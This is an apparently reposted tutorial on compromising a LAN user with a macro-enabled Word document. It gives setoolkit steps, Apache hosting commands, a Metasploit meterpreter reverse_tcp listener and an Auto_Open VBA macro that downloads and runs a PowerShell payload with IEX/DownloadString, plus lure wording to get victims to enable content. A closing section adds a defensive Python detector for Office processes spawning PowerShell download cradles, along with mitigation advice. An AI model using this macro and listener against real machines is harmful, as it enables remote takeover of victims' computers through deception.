The following is an article I read on generating an exploit for MS Word and using it to attack a LAN user.
What you will need:
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)
Create the payload. On Kali, open a terminal and type: setoolkit
Type “1”, then “9”, then “1” to select the “PowerShell Alphanumeric Shellcode Injector”.
Fill in the LHOST variable, which is your own IP address. This attack assumes you are on the same local subnet as your victim. Then fill in LPORT, the port the connection should come back on. People typically keep this at “4444”, but you can choose whatever you like. Answer “no” when asked whether to start the listener now.
Now move the payload to your web server:
```shell
mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
service apache2 start
```
Now we setup the listener:
```shell
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
exploit
```
Now we need to add the command to our MS Word document:
Open up a blank MS Word document and save it with a name like attack.docm, making sure the macro-enabled (.docm) format is used.
Go to the “View” tab, then Macros, enter “Auto_Open” with attack.docm selected as the location, click Create, and paste in the following:
```vba
Sub Auto_Open()
    Dim exec As String
    ' The host in the URL must be the web server holding payload.txt (the LHOST machine from the steps above)
    exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt'))"""
    Shell (exec)
End Sub

' Word also fires AutoOpen; forward it to the same routine
Sub AutoOpen()
    Auto_Open
End Sub

' Workbook_Open is an Excel event and is never raised by Word; left as an empty stub so the module compiles
Sub Workbook_Open()
End Sub
```
At this point you may want to obfuscate the code, but many people don’t even know how to get to the macros section of Word, much less what macros are, so we will skip this step. If you want to know how, read the article in the reference (the source).
Save the document.
Now we need to convince the victim that the document is safe. The article references wording tricks such as “To open the secure document, click Enable Content”.
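From the defender’s side, the macro above leaves a very distinctive trace: WINWORD.EXE spawning powershell.exe with an IEX/DownloadString cradle in its command line. The following Python is an added example, not from the article, that scores process-creation events for exactly that pattern; it assumes Sysmon Event ID 1 style field names (ParentImage, Image, CommandLine) and uses constructed sample events.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe \"IEX ((new-object net.webclient)"
                    ".downloadstring('http://10.0.0.13/payload.txt'))\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# The download cradle the macro uses: IEX over a string fetched with WebClient (plus common variants).
CRADLE_RE = re.compile(r"\b(iex|invoke-expression)\b.*\b(downloadstring|downloadfile|net\.webclient|invoke-webrequest)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (severity, reason, url) for a suspicious event, or None if it looks benign."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if parent not in OFFICE_APPS or child not in SHELLS:
        return None
    cmd = event["CommandLine"]
    url = URL_RE.search(cmd)
    url = url.group(0) if url else None          # handy for triage: where the stage-2 payload was fetched from
    if CRADLE_RE.search(cmd):
        return ("high", f"{parent} spawned {child} with a download cradle", url)
    return ("medium", f"{parent} spawned {child}", url)   # Office launching a shell is rarely legitimate

def scan(events):
    """Return a list of (index, severity, reason, url) for every suspicious event."""
    return [(i, *hit) for i, e in enumerate(events) if (hit := classify(e))]

if __name__ == "__main__":
    for idx, sev, reason, url in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {sev.upper()} - {reason}" + (f" (fetches {url})" if url else ""))
```

Blocking the cradle rather than only detecting it means disabling macros from the internet via Office policy and, where possible, constraining PowerShell with Constrained Language Mode or application control.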